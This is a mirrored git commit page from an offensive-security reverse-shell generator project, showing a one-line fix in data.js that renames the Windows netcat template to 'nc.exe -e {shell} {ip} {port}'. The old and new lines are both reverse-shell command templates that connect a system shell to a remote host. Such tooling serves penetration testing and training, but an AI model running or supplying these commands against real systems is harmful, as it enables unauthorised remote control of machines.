mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-01-18 17:05:26 +00:00
Update data.js
Fixed nc.exe
This commit is contained in:
parent
3555e4e8d2
commit
82644b5946
@ -57,7 +57,7 @@ const reverseShellCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "nc.exe -e",
|
||||
"command": "nc -e {shell} {ip} {port}",
|
||||
"command": "nc.exe -e {shell} {ip} {port}",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user